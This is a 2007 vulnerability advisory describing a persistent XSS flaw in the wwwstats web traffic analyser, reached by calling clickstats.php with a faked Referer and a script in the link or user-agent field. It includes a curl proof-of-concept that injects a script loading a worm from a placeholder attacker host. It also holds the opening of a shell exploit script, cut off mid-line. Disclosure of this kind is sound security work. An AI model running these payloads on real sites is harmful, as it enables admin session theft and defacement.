|
============================================INTERNET SECURITY AUDITORS ALERT 2007-004
- Original release date: November 7th, 2007
- Last revised: December 7th, 2007
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
============================================
I. VULNERABILITY
-------------------------
wwwstats is vulnerable to Persistent XSS
II. BACKGROUND
-------------------------
wwwstats is a very widely used Web traffic analyser, that registers in
a database the user agents, referers, downloads, etc ..
III. DESCRIPTION
-------------------------
Is possible to inject HTML and JavaScript to the database by calling
directly the clickstats.php code. This would mean web defacing, steal
admin sessions, web redirecting and WSS Worms.
To bypass the first 'if', is necessary to fill the HTTP Referer field
with something, and inject the link to the database by the link get
parameter.
An attacker can inject using the link parameter or the useragent field
a script which will steal admin's cookies, or make a deface, or
anything else...
If magic quotes are configured at php.ini, there is no problem, in
javascript \'test\' is interpreted as 'test'.
IV. PROOF OF CONCEPT
-------------------------
Controlling the iterations number, is possible to do the injection in
the ranking position you want:
while [ 1 ]; do
curl
'http://web.com/wwwstats/clickstats.php?link=scr='http://evilsite.com/XSSWorm.js'>
------------Exploit------------
#!/bin/sh
#jolmos (at) isecauditors (dot) com
if [ $# -ne 4 ]
then
echo "Usage: $0